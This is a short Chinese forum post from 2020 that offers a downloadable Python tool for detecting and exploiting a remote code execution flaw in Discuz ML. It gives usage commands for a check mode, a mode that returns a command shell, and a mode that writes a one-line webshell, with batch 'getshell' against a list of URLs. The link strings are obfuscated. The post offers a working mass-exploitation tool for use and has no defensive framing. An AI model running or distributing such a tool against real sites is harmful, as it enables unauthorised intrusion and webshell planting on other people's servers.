-
-
[下载]Discuz ML RCE 漏洞批量检测利用工具
-
发表于: 2020-3-28 11:16
-
工具说明本工具支持单url和批量检测,有判断模式(只判断有无该漏洞)、cmdshell模式(返回简单的cmd shell)和getshell模式(写入一句话木马)。
使用时加上漏洞PHP页面如(forum.php,portal.php),直接写域名可能会重定向导致误报。
环境插件
python2.7
pip -r requirements.txt
使用方法
判断模式 python dzml.py -u "a46K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6^5P5q4)9J5k6i4S2^5i4K6u0W2j5$3!0E0i4K6u0r3k6X3!0J5N6h3#2Q4x3X3g2H3K9s2l9`."
cmdshell模式 python dzml.py -u "f97K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6^5P5q4)9J5k6i4S2^5i4K6u0W2j5$3!0E0i4K6u0r3k6X3!0J5N6h3#2Q4x3X3g2H3K9s2l9`." --cmdshell
getshell模式 python dzml.py -u "dc3K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6^5P5q4)9J5k6i4S2^5i4K6u0W2j5$3!0E0i4K6u0r3k6X3!0J5N6h3#2Q4x3X3g2H3K9s2l9`." --getshell
批量检测 python dzml.py -f urls.txt
批量getshell python dzml.py -f urls.txt --getshell
下载地址:
eadK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6@1K9r3g2x3f1@1q4Q4x3V1k6V1K9i4y4U0N6i4A6Q4x3X3c8E0L8q4)9J5k6s2u0U0k6g2)9J5k6h3N6A6N6l9`.`.
|
|
|---|---|
